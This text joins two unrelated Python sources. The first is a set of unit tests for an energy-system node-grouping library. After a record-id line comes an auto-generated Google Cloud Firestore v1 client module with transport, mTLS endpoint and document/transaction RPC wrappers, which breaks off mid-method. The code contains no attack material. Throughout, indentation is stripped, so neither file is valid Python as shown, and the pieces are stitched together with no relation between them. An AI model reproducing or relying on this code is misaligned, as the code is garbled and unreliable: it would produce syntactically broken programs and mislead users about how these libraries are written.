def test_proper_filtering(self):
""" `Grouping.filter` should not be "all or nothing".
There was a bug where, if `Grouping.filter` returned `False` only for
some elements of `Grouping.value(e)`, those elements where actually
retained.
This test makes sure that the bug doesn't resurface again.
"""
g = Nodes(key="group", value=lambda _: {1, 2, 3, 4},
filter=lambda x: x % 2 == 0)
ensys = es.EnergySystem(groupings=[g])
special = Node(label="object")
ensys.add(special)
eq_(ensys.groups["group"], {2, 4})
def test_non_callable_group_keys(self):
collect_everything = Nodes(key="everything")
g1 = Grouping(key="The Special One",
filter=lambda e: "special" in e.label)
g2 = Nodes(key="A Subset", filter=lambda e: "subset" in e.label)
ensys = es.EnergySystem(groupings=[g1, g2, collect_everything])
special = Node(label="special")
subset = set(Node(label="subset: {}".format(i)) for i in range(2))
others = set(Node(label="other: {}".format(i)) for i in range(2))
everything = subset.union(others)
everything.add(special)
ensys.add(*everything)
eq_(ensys.groups["The Special One"], special)
eq_(ensys.groups["A Subset"], subset)
eq_(ensys.groups["everything"], everything)
def test_grouping_laziness(self):
""" Energy system `groups` should be fully lazy.
`Node`s added to an energy system should only be tested for and put
into their respective groups right before the `groups` property of an
energy system is accessed.
"""
group = "Group"
g = Nodes(key=group, filter=lambda n: getattr(n, "group", False))
self.es = es.EnergySystem(groupings=[g])
buses = [Bus("Grouped"), Bus("Ungrouped one"), Bus("Ungrouped two")]
self.es.add(buses[0])
buses[0].group = True
self.es.add(*buses[1:])
ok_(
group in self.es.groups,
"\nExpected to find\n\n `{!r}`\n\nin `es.groups`.\nGot:\n\n `{}`"
.format(
group,
"\n ".join(pformat(set(self.es.groups.keys())).split("\n")),
),
)
ok_(
buses[0] in self.es.groups[group],
"\nExpected\n\n `{}`\n\nin `es.groups['{}']`:\n\n `{}`"
.format(
"\n ".join(pformat(buses[0]).split("\n")),
group,
"\n ".join(pformat(self.es.groups[group]).split("\n"))
),
)
@temporarily_modifies_registry
def test_constant_group_keys(self):
""" Callable keys passed in as `constant_key` should not be called.
The `constant_key` parameter can be used to specify callable group keys
without having to worry about `Grouping`s trying to call them. This
test makes sure that the parameter is handled correctly.
"""
everything = lambda: "everything"
collect_everything = Nodes(constant_key=everything)
ensys = es.EnergySystem(groupings=[collect_everything])
Node.registry = ensys
node = Node(label="A Node")
ok_("everything" not in ensys.groups)
ok_(everything in ensys.groups)
eq_(ensys.groups[everything], {node})
@temporarily_modifies_registry
def test_flows(self):
key = object()
ensys = es.EnergySystem(groupings=[Flows(key)])
Node.registry = ensys
flows = (object(), object())
bus = NewBus(label="A Bus")
Node(label="A Node", inputs={bus: flows[0]}, outputs={bus: flows[1]})
eq_(ensys.groups[key], set(flows))
@temporarily_modifies_registry
def test_flows_with_nodes(self):
key = object()
ensys = es.EnergySystem(groupings=[FWNs(key)])
Node.registry = ensys
flows = (object(), object())
bus = NewBus(label="A Bus")
node = Node(label="A Node",
inputs={bus: flows[0]}, outputs={bus: flows[1]})
eq_(ensys.groups[key], {(bus, node, flows[0]), (node, bus, flows[1])})
def test_that_node_additions_are_signalled(self):
"""
When a node gets `add`ed, a corresponding signal should be emitted.
"""
node = Node(label="Node")
def subscriber(sender, **kwargs):
ok_(sender is node)
ok_(kwargs['EnergySystem'] is self.es)
subscriber.called = True
subscriber.called = False
es.EnergySystem.signals[es.EnergySystem.add].connect(
subscriber, sender=node
)
self.es.add(node)
ok_(
subscriber.called,
(
"\nExpected `subscriber.called` to be `True`.\n"
"Got {}.\n"
"Probable reason: `subscriber` didn't get called."
).format(subscriber.called),
)
|
the-stack_0_25980
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import (
Callable,
Dict,
Optional,
Iterable,
Iterator,
Sequence,
Tuple,
Type,
Union,
)
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.firestore_v1.services.firestore import pagers
from google.cloud.firestore_v1.types import common
from google.cloud.firestore_v1.types import document
from google.cloud.firestore_v1.types import document as gf_document
from google.cloud.firestore_v1.types import firestore
from google.cloud.firestore_v1.types import query
from google.cloud.firestore_v1.types import write as gf_write
from google.protobuf import timestamp_pb2 # type: ignore
from google.rpc import status_pb2 # type: ignore
from .transports.base import FirestoreTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import FirestoreGrpcTransport
from .transports.grpc_asyncio import FirestoreGrpcAsyncIOTransport
class FirestoreClientMeta(type):
"""Metaclass for the Firestore client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = OrderedDict() # type: Dict[str, Type[FirestoreTransport]]
_transport_registry["grpc"] = FirestoreGrpcTransport
_transport_registry["grpc_asyncio"] = FirestoreGrpcAsyncIOTransport
def get_transport_class(cls, label: str = None,) -> Type[FirestoreTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class FirestoreClient(metaclass=FirestoreClientMeta):
"""The Cloud Firestore service.
Cloud Firestore is a fast, fully managed, serverless, cloud-
native NoSQL document database that simplifies storing, syncing,
and querying data for your mobile, web, and IoT apps at global
scale. Its client libraries provide live synchronization and
offline support, while its security features and integrations
with Firebase and Google Cloud Platform (GCP) accelerate
building truly serverless apps.
"""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "firestore.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
FirestoreClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
FirestoreClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> FirestoreTransport:
"""Returns the transport used by the client instance.
Returns:
FirestoreTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, FirestoreTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the firestore client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, FirestoreTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(
util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false"))
)
client_cert_source_func = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
is_mtls = True
client_cert_source_func = client_options.client_cert_source
else:
is_mtls = mtls.has_default_client_cert_source()
if is_mtls:
client_cert_source_func = mtls.default_client_cert_source()
else:
client_cert_source_func = None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
if is_mtls:
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
else:
api_endpoint = self.DEFAULT_ENDPOINT
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted "
"values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, FirestoreTransport):
# transport is a FirestoreTransport instance.
if credentials or client_options.credentials_file:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
if client_options.scopes:
raise ValueError(
"When providing a transport instance, provide its scopes "
"directly."
)
self._transport = transport
else:
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
always_use_jwt_access=(
Transport == type(self).get_transport_class("grpc")
or Transport == type(self).get_transport_class("grpc_asyncio")
),
)
def get_document(
self,
request: firestore.GetDocumentRequest = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> document.Document:
r"""Gets a single document.
Args:
request (google.cloud.firestore_v1.types.GetDocumentRequest):
The request object. The request for
[Firestore.GetDocument][google.firestore.v1.Firestore.GetDocument].
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.firestore_v1.types.Document:
A Firestore document.
Must not exceed 1 MiB - 4 bytes.
"""
# Create or coerce a protobuf request object.
# Minor optimization to avoid making a copy if the user passes
# in a firestore.GetDocumentRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.GetDocumentRequest):
request = firestore.GetDocumentRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_document]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def list_documents(
self,
request: firestore.ListDocumentsRequest = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListDocumentsPager:
r"""Lists documents.
Args:
request (google.cloud.firestore_v1.types.ListDocumentsRequest):
The request object. The request for
[Firestore.ListDocuments][google.firestore.v1.Firestore.ListDocuments].
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.firestore_v1.services.firestore.pagers.ListDocumentsPager:
The response for
[Firestore.ListDocuments][google.firestore.v1.Firestore.ListDocuments].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Minor optimization to avoid making a copy if the user passes
# in a firestore.ListDocumentsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.ListDocumentsRequest):
request = firestore.ListDocumentsRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_documents]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListDocumentsPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def update_document(
self,
request: firestore.UpdateDocumentRequest = None,
*,
document: gf_document.Document = None,
update_mask: common.DocumentMask = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> gf_document.Document:
r"""Updates or inserts a document.
Args:
request (google.cloud.firestore_v1.types.UpdateDocumentRequest):
The request object. The request for
[Firestore.UpdateDocument][google.firestore.v1.Firestore.UpdateDocument].
document (google.cloud.firestore_v1.types.Document):
Required. The updated document.
Creates the document if it does not
already exist.
This corresponds to the ``document`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.cloud.firestore_v1.types.DocumentMask):
The fields to update.
None of the field paths in the mask may
contain a reserved name.
If the document exists on the server and
has fields not referenced in the mask,
they are left unchanged.
Fields referenced in the mask, but not
present in the input document, are
deleted from the document on the server.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.firestore_v1.types.Document:
A Firestore document.
Must not exceed 1 MiB - 4 bytes.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([document, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a firestore.UpdateDocumentRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.UpdateDocumentRequest):
request = firestore.UpdateDocumentRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if document is not None:
request.document = document
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.update_document]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("document.name", request.document.name),)
),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def delete_document(
self,
request: firestore.DeleteDocumentRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Deletes a document.
Args:
request (google.cloud.firestore_v1.types.DeleteDocumentRequest):
The request object. The request for
[Firestore.DeleteDocument][google.firestore.v1.Firestore.DeleteDocument].
name (str):
Required. The resource name of the Document to delete.
In the format:
``projects/{project_id}/databases/{database_id}/documents/{document_path}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a firestore.DeleteDocumentRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.DeleteDocumentRequest):
request = firestore.DeleteDocumentRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_document]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
rpc(
request, retry=retry, timeout=timeout, metadata=metadata,
)
def batch_get_documents(
self,
request: firestore.BatchGetDocumentsRequest = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> Iterable[firestore.BatchGetDocumentsResponse]:
r"""Gets multiple documents.
Documents returned by this method are not guaranteed to
be returned in the same order that they were requested.
Args:
request (google.cloud.firestore_v1.types.BatchGetDocumentsRequest):
The request object. The request for
[Firestore.BatchGetDocuments][google.firestore.v1.Firestore.BatchGetDocuments].
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
Iterable[google.cloud.firestore_v1.types.BatchGetDocumentsResponse]:
The streamed response for
[Firestore.BatchGetDocuments][google.firestore.v1.Firestore.BatchGetDocuments].
"""
# Create or coerce a protobuf request object.
# Minor optimization to avoid making a copy if the user passes
# in a firestore.BatchGetDocumentsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.BatchGetDocumentsRequest):
request = firestore.BatchGetDocumentsRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.batch_get_documents]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("database", request.database),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def begin_transaction(
self,
request: firestore.BeginTransactionRequest = None,
*,
database: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> firestore.BeginTransactionResponse:
r"""Starts a new transaction.
Args:
request (google.cloud.firestore_v1.types.BeginTransactionRequest):
The request object. The request for
[Firestore.BeginTransaction][google.firestore.v1.Firestore.BeginTransaction].
database (str):
Required. The database name. In the format:
``projects/{project_id}/databases/{database_id}``.
This corresponds to the ``database`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.firestore_v1.types.BeginTransactionResponse:
The response for
[Firestore.BeginTransaction][google.firestore.v1.Firestore.BeginTransaction].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([database])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a firestore.BeginTransactionRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.BeginTransactionRequest):
request = firestore.BeginTransactionRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if database is not None:
request.database = database
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.begin_transaction]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("database", request.database),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def commit(
self,
request: firestore.CommitRequest = None,
*,
database: str = None,
writes: Sequence[gf_write.Write] = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> firestore.CommitResponse:
r"""Commits a transaction, while optionally updating
documents.
Args:
request (google.cloud.firestore_v1.types.CommitRequest):
The request object. The request for
[Firestore.Commit][google.firestore.v1.Firestore.Commit].
database (str):
Required. The database name. In the format:
``projects/{project_id}/databases/{database_id}``.
This corresponds to the ``database`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
writes (Sequence[google.cloud.firestore_v1.types.Write]):
The writes to apply.
Always executed atomically and in order.
This corresponds to the ``writes`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.firestore_v1.types.CommitResponse:
The response for
[Firestore.Commit][google.firestore.v1.Firestore.Commit].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([database, writes])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a firestore.CommitRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.CommitRequest):
request = firestore.CommitRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if database is not None:
request.database = database
if writes is not None:
request.writes = writes
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.commit]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("database", request.database),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def rollback(
self,
request: firestore.RollbackRequest = None,
*,
database: str = None,
transaction: bytes = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Rolls back a transaction.
Args:
request (google.cloud.firestore_v1.types.RollbackRequest):
The request object. The request for
[Firestore.Rollback][google.firestore.v1.Firestore.Rollback].
database (str):
Required. The database name. In the format:
``projects/{project_id}/databases/{database_id}``.
This corresponds to the ``database`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
transaction (bytes):
Required. The transaction to roll
back.
This corresponds to the ``transaction`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([database, transaction])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a firestore.RollbackRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.RollbackRequest):
request = firestore.RollbackRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if database is not None:
request.database = database
if transaction is not None:
request.transaction = transaction
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.rollback]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("database", request.database),)),
)
# Send the request.
rpc(
request, retry=retry, timeout=timeout, metadata=metadata,
)
def run_query(
self,
request: firestore.RunQueryRequest = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> Iterable[firestore.RunQueryResponse]:
r"""Runs a query.
Args:
request (google.cloud.firestore_v1.types.RunQueryRequest):
The request object. The request for
[Firestore.RunQuery][google.firestore.v1.Firestore.RunQuery].
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
Iterable[google.cloud.firestore_v1.types.RunQueryResponse]:
The response for
[Firestore.RunQuery][google.firestore.v1.Firestore.RunQuery].
"""
# Create or coerce a protobuf request object.
# Minor optimization to avoid making a copy if the user passes
# in a firestore.RunQueryRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.RunQueryRequest):
request = firestore.RunQueryRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.run_query]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def partition_query(
self,
request: firestore.PartitionQueryRequest = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.PartitionQueryPager:
r"""Partitions a query by returning partition cursors
that can be used to run the query in parallel. The
returned partition cursors are split points that can be
used by RunQuery as starting/end points for the query
results.
Args:
request (google.cloud.firestore_v1.types.PartitionQueryRequest):
The request object. The request for
[Firestore.PartitionQuery][google.firestore.v1.Firestore.PartitionQuery].
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.firestore_v1.services.firestore.pagers.PartitionQueryPager:
The response for
[Firestore.PartitionQuery][google.firestore.v1.Firestore.PartitionQuery].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Minor optimization to avoid making a copy if the user passes
# in a firestore.PartitionQueryRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.PartitionQueryRequest):
request = firestore.PartitionQueryRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.partition_query]
# Certain fields should be provided within the metadata header;
# add these here.
